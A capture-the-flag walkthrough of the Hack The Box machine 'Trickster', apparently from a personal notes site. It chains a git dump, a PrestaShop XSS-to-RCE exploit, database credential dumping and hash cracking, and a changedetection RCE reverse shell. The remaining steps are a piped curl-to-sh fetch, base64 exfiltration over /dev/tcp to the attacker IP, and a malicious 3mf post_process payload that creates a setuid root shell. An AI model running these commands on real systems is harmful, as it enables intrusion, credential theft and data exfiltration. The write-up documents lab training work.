Trickster

Recon

HTTP (80)

Placeholder

Shop

Creds: test:test:test02@trickster.htb:Password123$Lmao

PrestaShop is a freemium, open source e-commerce platform.

Git Dump

Feroxbuster found http://shop.trickster.htb/.git/index

└─$ git-dumper http://shop.trickster.htb/ shop
[-] Testing http://shop.trickster.htb/.git/HEAD [200]
[-] Testing http://shop.trickster.htb/.git/ [200]
[-] Fetching .git recursively
...
Updated 1699 paths from the index

Hidden Admin Panel

Inside we get bunch of default files and admin634ewutrx1jgitlooaj directory, which should be a path.

http://shop.trickster.htb/admin634ewutrx1jgitlooaj/

adam made changes:

commit 0cbc7831c1104f1fb0948ba46f75f1666e18e64c (HEAD -> admin_panel)
Author: adam <adam@trickster.htb>
Date:   Fri May 24 04:13:19 2024 -0400

    update admin pannel

Officially disclosed vulnerabilities: https://github.com/PrestaShop/PrestaShop/releases/tag/8.1.6

Doesn't work: (CVE-2024-36680) Improper neutralization of SQL parameter in Promokit.eu - Facebook module for PrestaShop

XSS -> RCE

XSS: CVE-2024-34716 – The Deceptive PNG Trap: Breaking Down the PNG-Driven Chain from XSS to Remote Code Execution on PrestaShop (<=8.1.5) PoC: https://github.com/aelmokhtar/CVE-2024-34716

As blog says make changes to your exploit.html:

Some changes are needed in exploit.py too (proxies was added for debug).

Also reverse shell in zip file with your IP! after getting request on zip shell should come in quickly.

MySQL

www-data@trickster:~/prestashop/app/config$ cat parameters.php
<?php return array (
  'parameters' =>
  array (
    'database_host' => '127.0.0.1',
    'database_port' => '',
    'database_name' => 'prestashop',
    'database_user' => 'ps_user',
    'database_password' => 'prest@shop_o',
    'database_prefix' => 'ps_',
    'database_engine' => 'InnoDB',
    'mailer_transport' => 'smtp',
    'mailer_host' => '127.0.0.1',
    'mailer_user' => NULL,
    'mailer_password' => NULL,
    'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
    'ps_caching' => 'CacheMemcache',
    'ps_cache_enable' => false,
    'ps_creation_date' => '2024-05-25',
    'locale' => 'en-US',
    'use_debug_toolbar' => true,
    'cookie_key' => '8PR6s1SJZLPCjXTegH7fXttSAXbG2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i',
    'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g',
    'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03f4040bd5e8cb44bdb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47',
    'api_public_key' => '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr
v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG
5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt
Scu6QqRAdotokqW2m3aMt+LV8ERdFsBkj+/OVdJ8oslvSt6Kgf39DnBpGIXAqaFc
QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm
B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1
ZQIDAQAB
-----END PUBLIC KEY-----
',
    'api_private_key' => '-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC5IVA/fGtlxwpt
L9UYoyu/x0XggmH0X02+Y9mqIU2kmcEeF9YTdhUz86sREQYrO2QcWxAZRlcUjCIF
BWzmQAbmN/D6FCuXz34lEPSiBn44dR838KCYzZ6rUf+DEBh9xF/CNKU6HZjMDCku
/C1hcG1Jy7pCpEB2i2iSpbabdoy34tXwRF0WwGSP785V0nyiyW9K3oqB/f0OcGkY
hcCpoVxB0x2r7WVP2iJvLR7HJSSXpolTbVJMVnuQJ/RJ5ynZ/02hoqgHAL2bvTsL
ZQI2QCYHYDbDF/zwEMLsK3BrPANb1Bd0X3ztFTMaP1SsRbBPBgRwlxX+E0Hjvdtz
K1om9jVlAgMBAAECggEAD5CTdKL7TJVNdRyeZ/HgDcGtSFDt92PD34v5kuo14u7i
Y6tRXlWBNtr3uPmbcSsPIasuUVGupJWbjpyEKV+ctOJjKkNj3uGdE3S3fJ/bINgI
BeX/OpmfC3xbZSOHS5ulCWjvs1EltZIYLFEbZ6PSLHAqesvgd5cE9b9k+PEgp50Q
DivaH4PxfI7IKLlcWiq2mBrYwsWHIlcaN0Ys7h0RYn7OjhrPr8V/LyJLIlapBeQV
Geq6MswRO6OXfLs4Rzuw17S9nQ0PDi4OqsG6I2tm4Puq4kB5CzqQ8WfsMiz6zFU/
UIHnnv9jrqfHGYoq9g5rQWKyjxMTlKA8PnMiKzssiQKBgQDeamSzzG6fdtSlK8zC
TXHpssVQjbw9aIQYX6YaiApvsi8a6V5E8IesHqDnS+s+9vjrHew4rZ6Uy0uV9p2P
MAi3gd1Gl9mBQd36Dp53AWik29cxKPdvj92ZBiygtRgTyxWHQ7E6WwxeNUWwMR/i
4XoaSFyWK7v5Aoa59ECduzJm1wKBgQDVFaDVFgBS36r4fvmw4JUYAEo/u6do3Xq9
JQRALrEO9mdIsBjYs9N8gte/9FAijxCIprDzFFhgUxYFSoUexyRkt7fAsFpuSRgs
+Ksu4bKxkIQaa5pn2WNh1rdHq06KryC0iLbNii6eiHMyIDYKX9KpByaGDtmfrsRs
uxD9umhKIwKBgECAXl/+Q36feZ/FCga3ave5TpvD3vl4HAbthkBff5dQ93Q4hYw8
rTvvTf6F9900xo95CA6P21OPeYYuFRd3eK+vS7qzQvLHZValcrNUh0J4NvocxVVn
RX6hWcPpgOgMl1u49+bSjM2taV5lgLfNaBnDLoamfEcEwomfGjYkGcPVAoGBAILy
1rL84VgMslIiHipP6fAlBXwjQ19TdMFWRUV4LEFotdJavfo2kMpc0l/ZsYF7cAq6
fdX0c9dGWCsKP8LJWRk4OgmFlx1deCjy7KhT9W/fwv9Fj08wrj2LKXk20n6x3yRz
O/wWZk3wxvJQD0XS23Aav9b0u1LBoV68m1WCP+MHAoGBANwjGWnrY6TexCRzKdOQ
K/cEIFYczJn7IB/zbB1SEC19vRT5ps89Z25BOu/hCVRhVg9bb5QslLSGNPlmuEpo
HfSWR+q1UdaEfABY59ZsFSuhbqvC5gvRZVQ55bPLuja5mc/VvPIGT/BGY7lAdEbK
6SMIa53I2hJz4IMK4vc2Ssqq
-----END PRIVATE KEY-----
',
  ),
);

www-data@trickster:~/prestashop/app/config$ mysql -u'ps_user' -p'prest@shop_o' prestashop -e 'SELECT email, passwd FROM ps_customer;'
+----------------------+--------------------------------------------------------------+
| email                | passwd                                                       |
+----------------------+--------------------------------------------------------------+
| adam@trickster.htb   | $2y$10$kY2G39RBz9P0S48EuSobuOJba/HgmQ7ZtajfZZ3plVLWnaBbS4gei |
| anonymous@psgdpr.com | $2y$10$054Mo38DcRSLaMX9OhT5UuhYSQvorGu8nZb9GubbAv3Roei6RS2QW |
| pub@prestashop.com   | $2y$10$Cw68h0u8YeP6IiYRRaOjQu4AV7X9BTQL3ZK4CtHU16PNDg7LB4mEG |
| test02@trickster.htb | $2y$10$T3rriOVB5f4N2ijQ4ypXaOjRAy0YxAXa/a2TOgrue2W1NgWSsrx0u |
+----------------------+--------------------------------------------------------------+
www-data@trickster:~/prestashop$ mysql -u'ps_user' -p'prest@shop_o' prestashop -e 'SELECT email, passwd FROM ps_employee;'
+---------------------+--------------------------------------------------------------+
| email               | passwd                                                       |
+---------------------+--------------------------------------------------------------+
| admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C |
| james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm |
+---------------------+--------------------------------------------------------------+

SSH

James is the user on box, so that's our target:

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 16 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alwaysandforever (?)
1g 0:00:00:07 DONE (2024-09-22 01:26) 0.1421g/s 5270p/s 5270c/s 5270C/s baloon..EMILIO
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Creds: james:alwaysandforever

User.txt

james@trickster:~$ cat user.txt
f8120cf85a0e3bd98e4cab6122242713

Privilege Escalation

james@trickster:~$ curl 10.10.14.47/lp.sh|sh|tee /tmp/lp.log
...
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:4c:3e:57:d6  txqueuelen 0  (Ethernet)
        RX packets 90  bytes 5416 (5.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10  bytes 420 (420.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.148.34  netmask 255.255.0.0  broadcast 10.129.255.255
        ether 00:50:56:94:7d:78  txqueuelen 1000  (Ethernet)
        RX packets 40223  bytes 12591817 (12.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 27575  bytes 8047886 (8.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 390010  bytes 630032318 (630.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 390010  bytes 630032318 (630.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

veth679c878: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 8e:38:a4:a6:ab:8d  txqueuelen 0  (Ethernet)
        RX packets 10  bytes 708 (708.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2  bytes 84 (84.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:37301         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
...
╔══════════╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"

╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it
...

Cronjobs

pspy shows some cronjobs running as root:

2024/09/21 21:43:23 CMD: UID=0     PID=1      | /sbin/init
2024/09/21 21:44:01 CMD: UID=0     PID=70504  | /usr/sbin/CRON -f -P
2024/09/21 21:44:01 CMD: UID=0     PID=70506  | /bin/bash /root/changedetection/backup_restore.sh
2024/09/21 21:44:01 CMD: UID=0     PID=70505  | /bin/sh -c /root/changedetection/backup_restore.sh > /dev/null
2024/09/21 21:44:01 CMD: UID=0     PID=70507  | /bin/bash /root/changedetection/backup_restore.sh
2024/09/21 21:44:01 CMD: UID=0     PID=70509  | awk {print $1}
2024/09/21 21:44:01 CMD: UID=0     PID=70510  | /bin/bash /root/changedetection/backup_restore.sh
...
2024/09/21 21:44:11 CMD: UID=1003  PID=70513  | /home/runner/prestashop/chromedriver --port=52695
2024/09/21 21:44:11 CMD: UID=1003  PID=70526  | /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.5 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.112 --initial-client-fd=6 --shared-client-connection
2024/09/21 21:44:11 CMD: UID=1003  PID=70525  | /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.A64L6p data:,
...
2024/09/21 21:45:01 CMD: UID=0     PID=70597  | /bin/bash /root/scripts/clean_up/clean_up.sh

--remote-debugging-port=0 is interesting...

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/chrome-remote-debugger-pentesting/

Doing port forwarding on this port doesn't yield any success.

PrusaSlicer

Next interesting line is:

2024/09/21 21:44:01 CMD: UID=0     PID=70507  | /bin/bash /root/changedetection/backup_restore.sh

Because in opt there's prusaslicer binary.

james@trickster:/opt/PrusaSlicer$ ls -alh
total 81M
drwxr-xr-x 2 root root 4.0K Sep 13 12:24 .
drwxr-xr-x 5 root root 4.0K Sep 13 12:24 ..
-rwxr-xr-x 1 root root  81M Sep  6  2023 prusaslicer
-rw-r--r-- 1 root root 136K May 23 22:08 TRICKSTER.3mf

*.3mf file is some kind of 3D object...

james@trickster:/opt/PrusaSlicer$ ./prusaslicer
DISPLAY not set, GUI mode not available.

PrusaSlicer-2.6.1+linux-x64-GTK2-202309060801 based on Slic3r (with GUI support)
https://github.com/prusa3d/PrusaSlicer

PrusaSlicer 2.6.1 - Arbitrary code execution

2.) PoC
==========================================================================================

For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:

; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #"

Download the file

└─$ scp james@trickster.htb:/opt/PrusaSlicer/TRICKSTER.3mf ./TRICKSTER.3mf

Edit post_process in Metadata/Slic3r_PE.config. output_filename_format was causing errors so I just left base filename there.

; post_process = "install /bin/bash /tmp/rootbash -m 4777 # "
; output_filename_format = {input_filename_base}.gcode

└─$ scp ./TRICKSTER.3mf james@trickster.htb:/tmp/TRICKSTER.3mf
james@trickster:~$ /opt/PrusaSlicer/prusaslicer -s /tmp/TRICKSTER.3mf

Payload is successful, but the problem is we ran it, not root... So no priv esc...

runc

Linpeas previously showed runc was runnable and to check HackTrickshttps://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation https://dev.to/codeninjausman/hackthebox-htb-writeup-vessel-hard-10bb

Upon following the instructions we get

james@trickster:/tmp/t$ ps aux | grep runc
root       76436  0.0  0.3 1238400 12420 ?       Sl   22:40   0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id ae5c137aa8efc8eee17e3f5e2f93594b6bfc9ea2d7b350faba36e80d588aa47c -address /run/containerd/containerd.sock

james@trickster:/tmp/t$ runc run moby
FATA[0000] nsexec-1[77070]: failed to unshare user namespace: Operation not permitted
FATA[0000] nsexec-0[77069]: failed to sync with stage-1: next state: Success
ERRO[0000] runc run failed: unable to start container process: can't get final child's PID from pipe: EOF

Docker

I wasn't able to find anything useful, and the Docker kept bugging me so I just decided to scan the whole network.

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap

james@trickster:~$ /tmp/nmap -p- --min-rate 10000 172.17.0.1/16 -v -v -v -v
...
Nmap scan report for 172.17.255.254 [host down, received no-response]
Nmap scan report for 172.17.255.255 [host down, received net-unreach]
Initiating Connect Scan at 00:02
Scanning 2 hosts [65535 ports/host]
Discovered open port 80/tcp on 172.17.0.1
Discovered open port 22/tcp on 172.17.0.1
Discovered open port 5000/tcp on 172.17.0.2
Completed Connect Scan against 172.17.0.1 in 37.52s (1 host left)
Completed Connect Scan at 00:03, 37.52s elapsed (131070 total ports)
Nmap scan report for 172.17.0.1
Host is up, received syn-ack (0.0017s latency).
Scanned at 2024-09-21 23:57:17 UTC for 364s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Nmap scan report for 172.17.0.2
Host is up, received conn-refused (0.0018s latency).
Scanned at 2024-09-21 23:57:17 UTC for 364s
Not shown: 65534 closed ports
Reason: 65534 conn-refused
PORT     STATE SERVICE REASON
5000/tcp open  unknown syn-ack

Read data files from: /etc
Nmap done: 65536 IP addresses (2 hosts up) scanned in 363.82 seconds

Note: Probably would have been to scan /8 network 💀

Note (from _cutearmadillo_): You don't actually need to scan the network at all. The process list shows the PID of the container (containerd-shim-runc-v2), then you go check /proc/PID/net/arp. With ps -efj you also find the process running in the container and its PID and then check the open port via /proc/PID/net/tcp (in hex)

changedetection

└─$ ssh james@trickster.htb -L 5000:172.17.0.2:5000

It asks for password and James's password works.

Version is v0.45.20

changedetection < 0.45.20 - Remote Code Execution (RCE)CVE-2024-32651-changedetection-RCE

Remove the password authentication, because script doesn't like it.

Docker Shell

└─$ py CVE-2024-32651.py --url http://localhost:5000 --ip 10.10.14.47 --port 4444 --notification get://10.10.14.47
---
Now create a new file on server, then Recheck and then it gets triggered
---
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.148.34:46942.
root@ae5c137aa8ef:/app# id
uid=0(root) gid=0(root) groups=0(root)

Note: Make sure to change reddit urls in PoC to internal URLs, can be simple http server.

root@ae5c137aa8ef:/datastore# cat secret.txt;echo
5fce75c64d33acf05d2d3b21d29e693d992f240d5c440310cff3edfb743c64a5

root@ae5c137aa8ef:/datastore# tar -czvf data.tgz ./*
---
listen 4445 > data.tgz.base64
---
root@ae5c137aa8ef:/datastore# base64 data.tgz > /dev/tcp/10.10.14.47/4445
---
base64 -d data.tgz.base64 > data.tgz

Root (Unintended)

root@ae5c137aa8ef:~# ls -alh
ls -alh
total 36K
drwx------ 1 root root 4.0K Sep 13 12:24 .
drwxr-xr-x 1 root root 4.0K Sep 13 12:24 ..
-rw------- 1 root root  405 Sep 16 15:34 .bash_history
-rw-r--r-- 1 root root  571 Apr 10  2021 .bashrc
drwxr-xr-x 1 root root 4.0K Sep 13 12:24 .local
-rw-r--r-- 1 root root  161 Jul  9  2019 .profile
-rw-r--r-- 1 root root  254 Apr 10 04:57 .wget-hsts
root@ae5c137aa8ef:~# cat .bash_history
cat .bash_history
apt update
#YouC4ntCatchMe#
apt-get install libcap2-bin
capsh --print
clear
capsh --print
cd changedetectionio/

Creds: root:#YouC4ntCatchMe#

james@trickster:~$ su
Password:
root@trickster:~# id
uid=0(root) gid=0(root) groups=0(root)

Root.txt

root@trickster:~# cat root.txt
7e5354393df7a938ee6b7ec199173d06

Root (Intended)

└─$ sudo apt install brotli
└─$ pwd
//Trickster/www/data/Backups/changedetection-backup-20240830194841
└─$ unzip changedetection-backup-20240830194841.zip -d changedetection-backup-20240830194841
└─$ brotli -d changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt.br
└─$ grep -E 'user|pass' changedetection-backup-20240830194841 -Rain
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:27:                'database_user' => 'adam' ,                                                    
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:28:                'database_password' => 'adam_admin992' ,                                       
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:33:                'mailer_user' => NULL ,                                                        
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:34:                'mailer_password' => NULL ,                                                    
changedetection-backup-20240830194841/url-watches.json:145:            "password": false,
changedetection-backup-20240830194841/url-watches.json:332:            "removepassword_button": false

Creds: adam:adam_admin992

└─$ ssh adam@trickster.htb
adam@trickster.htb password: adam_admin992
adam@trickster:~$ sudo -l
Matching Defaults entries for adam on trickster:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User adam may run the following commands on trickster:
    (ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer

adam can run prusaslicer as root, so let's go back and use the previous malicious *.3mf file again for root.

adam@trickster:~$ sudo /opt/PrusaSlicer/prusaslicer -s /tmp/TRICKSTER.3mf
adam@trickster:~$ /tmp/rootbash -p
rootbash-5.1# id
uid=1002(adam) gid=1002(adam) euid=0(root) groups=1002(adam)

PreviousSightless NextUniversity

Last updated 7 months ago

hashtagRecon

hashtagHTTP (80)

hashtagPlaceholder

hashtagShop

hashtagGit Dump

hashtagHidden Admin Panel

hashtagXSS -> RCE

hashtagMySQL

hashtagSSH

hashtagUser.txt

hashtagPrivilege Escalation

hashtagCronjobs

hashtagPrusaSlicer

hashtagrunc

hashtagDocker

hashtagchangedetection

hashtagDocker Shell

hashtagRoot (Unintended)

hashtagRoot.txt

hashtagRoot (Intended)